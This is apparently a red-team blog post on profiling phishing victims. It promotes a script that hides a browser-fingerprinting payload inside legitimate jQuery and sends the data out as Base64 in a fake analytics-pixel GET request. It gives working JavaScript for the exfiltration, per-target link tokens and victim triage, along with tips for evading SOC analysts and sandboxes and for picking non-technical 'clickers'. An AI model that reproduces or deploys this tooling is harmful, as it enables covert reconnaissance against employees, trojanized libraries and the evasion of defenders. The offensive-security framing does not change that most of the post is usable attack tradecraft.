Thoughts on user profiling

Boy oh boy, has it been a while. New job, new state, new house, new excuses 🙂

I wanted to write a post on user profiling as a way to document and work out my own thoughts on the subject. Sometimes things that sound great in your head look utterly stupid once you put them to “ink”. This is also a good time to talk about a script that I pushed to GitHub:

https://github.com/keyzerrezyek/JQueryingU

The GitHub page has some background info on the script, including credit to the original author. I took his work, added Flash support, minified and packed the script, then tucked it inside legitimate jQuery. The profiling exfil method was also changed from a POST to a GET request for an image, with the profile data Base64-encoded into the query string.
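For the curious, the core trick is tiny. Here is a minimal sketch of the image-GET exfil idea, not the actual code from the repo; the analytics.gif path and uid parameter match the log example later in this post, and everything else is illustrative:

```javascript
// Minimal sketch: the collected profile string is Base64-encoded and smuggled
// out as the query string of a fake tracking-pixel request, so it blends in
// with ordinary analytics traffic instead of standing out as a POST.
function exfilProfile(profileString) {
  // btoa() Base64-encodes the ASCII profile string
  var encoded = btoa(profileString);

  // Setting .src on an Image fires a plain GET; no XHR/fetch, no POST body to inspect
  var pixel = new Image(1, 1);
  pixel.src = "/analytics.gif?uid=" + encodeURIComponent(encoded);
}

exfilProfile("id=sam|OS: Mac OS X 10.13|Browser: Firefox 60 (60.0)|Mobile: false");
```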

This post discusses the value of profiling users and whether there are benefits that have been overlooked.

Profiling activity through websites can be broken down into two categories:

  • Passive – no profiling script. The attacker just looks at the User-Agent in GET requests to an attacker-controlled domain
  • Active – a profiling script and/or cookies are used. The attacker monitors the POST or encoded GET output from the profiling script

The obvious benefit to passive is that there is no “script” for the victim’s SOC to find in the event that an email gets flagged as suspicious. The downside is that there are limits to the info you can get from a User-Agent; information such as support for Flash and Java will not be present. The benefits of active are the exact inverse of passive. That being said, plenty of legitimate “profiling” scripts are used by non-malicious websites to make sure the proper content is delivered. The rewards far outweigh the risks in my opinion. I might make an exception if the target is a known “hard target” or person of importance whose email will be under a higher degree of scrutiny.
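To make the passive side concrete, here is a rough Node sketch of pulling User-Agents back out of a combined-format access log; the log path is made up, and in practice you would filter on your phishing URIs first:

```javascript
// Rough sketch of "passive" profiling: nothing runs in the victim's browser,
// you just read User-Agent strings back out of your own web server's access log.
const fs = require("fs");

// Hypothetical path; point this at whatever access log your server writes
const log = fs.readFileSync("/var/log/nginx/access.log", "utf8");

for (const line of log.split("\n")) {
  // In combined log format the User-Agent is the last quoted field on the line
  const match = line.match(/"([^"]*)"\s*$/);
  if (match) {
    console.log(match[1]);
  }
}
```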

Focusing on the active side of things, what do we want to get out of profiling?

The obvious answer is, “the user’s plugins and versions so we can create a targeted exploit if applicable.” While that is still true, I believe this is becoming less relevant as Flash slowly phases out. Corporations often need to run Java, but sending an “exploit” to the endpoint is fairly risky when you don’t know what EDR products are on the workstation. Criminals had no problem doing this back in the day with exploit kits because it’s a numbers game and they weren’t trying to target one specific corporation the way a Red Teamer is.

A more nuanced benefit is that you can get an idea of which users are likely to click on links, and then follow up down the road with an actual payload for the specific users who are known “clickers”. No point in spraying your malicious link across an organization’s inboxes if you don’t have to. APTs are well known for performing recon before delivering payloads, but many Red Teams do not since they are on a tight timeframe.

I have no scientific data to back it up, but screen resolution is my favorite piece of data returned. Why? Most sandboxes run at very low resolutions, and I don’t believe I have ever seen one reporting a more modern resolution like 1920-wide. Additionally, if you see some crazy high resolution like 3840, I would stereotype that user as a higher-priority target such as a developer or sysadmin. I would also caution that those are the users most likely to report phishing or poke at your infrastructure. My ideal target is running IE at a resolution around 1600. Few technical users surf the web with IE if they have any other option, and most orgs have Chrome/Chromium or Firefox alongside the corporate-mandated IE that exists for some crappy legacy app that absolutely must be supported. So anyone with IE and a lower resolution is often our standard, non-technical office grunt. That being said, if people click links inside Outlook, they will sometimes open in IE as the default browser.
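To give a concrete flavor of that triage, here is a rough sketch that bins decoded profile strings using the rules of thumb above; the field names match the example output further down, while the thresholds are just my stereotypes, not science:

```javascript
// Rough triage of decoded profile strings using the heuristics described above.
function triage(profile) {
  // Parse "Key: Value" fields out of the pipe-delimited profile string
  const fields = {};
  for (const part of profile.split("|")) {
    const idx = part.indexOf(":");
    if (idx > -1) fields[part.slice(0, idx).trim()] = part.slice(idx + 1).trim();
  }

  const browser = fields["Browser"] || "";
  const size = (fields["Screen Size"] || "0 x 0").split("x").map(s => parseInt(s, 10));
  const width = size[0] || 0;

  if (width > 0 && width < 1280) return "possible sandbox (unusually low resolution)";
  if (width >= 3840) return "possible power user (dev/sysadmin) - handle with care";
  if (width > 0 && width <= 1680 && /MSIE|Internet Explorer|IE/.test(browser))
    return "likely non-technical user - good candidate";
  return "no strong signal";
}

console.log(triage("OS: Windows 7|Browser: IE 11|Screen Size: 1600 x 900"));
```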

An additional benefit is that you can embed a profiling script on a web page that contains a payload and then send each targeted user a link to a unique URI. For example, send users a link to http://example.com/clickme.php?companyname=unique_id where each unique_id is correlated to a particular targeted user. The profiling script I have put on GitHub is designed to be used this way. You would be amazed at how much traffic your site starts getting as soon as you start phishing. Being able to determine where the “leak” is, and whether requests from outside your targeted users are general spidering behavior or threat hunters performing targeted “poking”, is useful for gauging the overall security posture of your target. On past engagements I have heard a Tier 2 SOC analyst proudly say, “Did you see my request to your site? I used the Googlebot User-Agent.” Of course, a seasoned SOC will not typically touch any suspected attack infrastructure. But… this is the real world and it happens.
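A minimal sketch of that correlation might look like the following; the target list and domain are made up, and the repo itself doesn’t dictate how you generate or store the tokens:

```javascript
// Sketch of tying each phishing link to one target: every recipient gets a
// unique token in the URL, so any later hit on that token tells you whose link
// was clicked (or forwarded, or reported).
const crypto = require("crypto");

const targets = ["alice@example.com", "bob@example.com"]; // hypothetical recipients
const lookup = {};

for (const email of targets) {
  const token = crypto.randomBytes(6).toString("hex"); // e.g. "9f86d081a3b4"
  lookup[token] = email;
  console.log(`${email} -> http://example.com/clickme.php?companyname=${token}`);
}

// Later, when ?companyname=<token> shows up in the access log,
// lookup[token] identifies which recipient's link was used.
```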

The profiling script, which is 90% the code created by Christian Ludwig (cited on my GitHub), is pretty standard. It gives you the following info:

http://localhost:8000/index.php?id=sam|OS: Mac OS X 10.13|Browser: Firefox 60 (60.0)|Mobile: false|Flash: 29.0 r0|Java: false|Cookies: true|Screen Size: 1680 x 1050|Language: en-US|Full User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0

The original request inside your access log will look as follows:

Example Log output: [Mon Apr 16 11:51:17 2018] ::1:63582 [200]: /analytics.gif?uid=aHR0cDovL2xvY2FsaG9zdDo4MDAwL2luZGV4LnBocD9pZD1zYW18T1M6IE1hYyBPUyBYIDEwLjEzfEJyb3dzZXI6IEZpcmVmb3ggNjAgKDYwLjApfE1vYmlsZTogZmFsc2V8Rmxhc2g6IDI5LjAgcjB8SmF2YTogZmFsc2V8Q29va2llczogdHJ1ZXxTY3JlZW4gU2l6ZTogMTY4MCB4IDEwNTB8TGFuZ3VhZ2U6IGVuLVVTfEZ1bGwgVXNlciBBZ2VudDogTW96aWxsYS81LjAgKE1hY2ludG9zaDsgSW50ZWwgTWFjIE9TIFggMTAuMTM7IHJ2OjYwLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjAuMA==
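Decoding the uid value back into the readable profile string is just a one-liner; for example (uid truncated here for readability, paste the full value from your log):

```javascript
// The uid parameter is plain Base64; decoding it recovers the pipe-delimited
// profile string shown earlier in the post.
const uid = "aHR0cDovL2xvY2FsaG9zdDo4MDAwL2luZGV4LnBocD9pZD1zYW18T1M6IE1hYyBPUyBYIDEwLjEz";

const decoded = Buffer.from(uid, "base64").toString("utf8");
console.log(decoded);
// -> http://localhost:8000/index.php?id=sam|OS: Mac OS X 10.13
```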

Happy Profiling.
